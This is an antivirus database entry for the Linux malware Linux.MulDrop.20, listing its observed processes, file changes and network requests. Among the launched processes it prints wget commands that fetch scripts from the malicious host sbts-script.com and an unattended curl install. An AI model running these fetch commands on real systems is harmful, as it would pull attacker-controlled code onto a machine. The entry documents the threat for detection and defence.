Linux.MulDrop.20
Added to the Dr.Web virus database: 2017-11-12
Virus description added: 2017-11-12
Technical Information
Malicious functions:
Launches itself as a daemon
Performs process tracing:
- <SAMPLE>
- <SAMPLE_FULL_PATH>
Launches processes:
- /bin/bash <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' "$@" <SAMPLE_FULL_PATH>
- <SAMPLE_FULL_PATH>
- /bin/bash <SAMPLE_FULL_PATH> -c
- wget http://sbts-script.com//rectussc/dosyalar/sinusbotverison.php -q -O -
- ip addr
- tail -n1
- grep state UP -A2
- cut -f1 -d/
- awk {print $2}
- wget /rectussc/dosyalar/sbguncelle.php -q -O -
- grep -c ok installed
- dpkg-query -W -f=${Status} curl
- apt-get -y install curl
- /usr/bin/dpkg --print-foreign-architectures
- /usr/lib/apt/methods/http
- /usr/bin/dpkg --assert-multi-arch
- /bin/sh -c /usr/bin/apt-listchanges --apt || test $? -ne 10
- /usr/bin/apt-listchanges --apt
- /bin/sh -c /usr/sbin/dpkg-preconfigure --apt || true
- /usr/sbin/dpkg-preconfigure --apt
- locale charmap
- sh -c stty -a 2>/dev/null
- stty -a
- /usr/bin/dpkg --status-fd 17 --unpack --auto-deconfigure /var/cache/apt/archives/libcurl3_7.38.0-4+deb8u5_amd64.deb /var/cache/apt/archives/curl_7.38.0-4+deb8u5_amd64.deb
Kills the following processes:
- <SAMPLE>
- <SAMPLE_FULL_PATH>
- /usr/lib/apt/methods/http
Performs operations with the file system:
Modifies file access rights:
- /var/log/apt/term.log
- /var/log/apt/history.log
Creates or modifies files:
- /var/lib/dpkg/lock
- /var/cache/apt/archives/lock
- /var/cache/apt/archives/partial/libcurl3_7.38.0-4+deb8u5_amd64.deb
- /var/cache/apt/archives/partial/curl_7.38.0-4+deb8u5_amd64.deb
- /var/lib/apt/listchanges.db
- /var/log/apt/term.log
- /var/log/apt/history.log
Locks files:
- /var/cache/debconf/config.dat
- /var/cache/debconf/passwords.dat
- /var/cache/debconf/templates.dat
Network activity:
Establishes connection:
HTTP GET requests:
- sb#########.###//rectussc/dosyalar/sinusbotverison.php
- ft#.##.######.#######ian/pool/main/c/curl/libcurl3_7.38.0-4%2bdeb8u5_amd64.deb
- ft#.##.######.######bian/pool/main/c/curl/curl_7.38.0-4%2bdeb8u5_amd64.deb
DNS ASK:
- sb###script.com
- ft#.##.debian.org
Other:
Collects CPU information
Collects RAM information
Curing recommendations
Linux